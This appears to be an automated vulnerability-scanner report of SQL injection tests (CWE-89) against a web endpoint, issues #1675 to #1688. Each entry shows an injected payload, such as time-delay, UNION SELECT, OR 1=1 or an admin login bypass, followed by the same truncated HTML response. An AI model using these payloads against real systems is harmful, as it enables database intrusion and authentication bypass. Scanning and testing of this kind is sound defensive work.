content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1675\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#CWE-ID CWE-89\nIssue Number #1676\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# or pg_SLEEP(5)#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1677\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),3,4--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1678\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# or 1=1#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1679\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1680\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 18--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1681\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ');waitfor delay '0:0:5'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1682\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 'LIKE'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1683\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR\n(88)+CHAR(118)+CHAR(120)+CHAR(80)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89Issue Number #1684\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),\"'3'\"#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1685\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 16#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1686\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 1' ORDER BY 1--+\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1687\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1# 1234 ' AND 1=0 UNION ALL SELECT 'admin', '\n81dc9bdb52d04dc20036dbd8313ed055\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1688\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 7300=7300 AND 'pKlZ'='\npKlY\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap 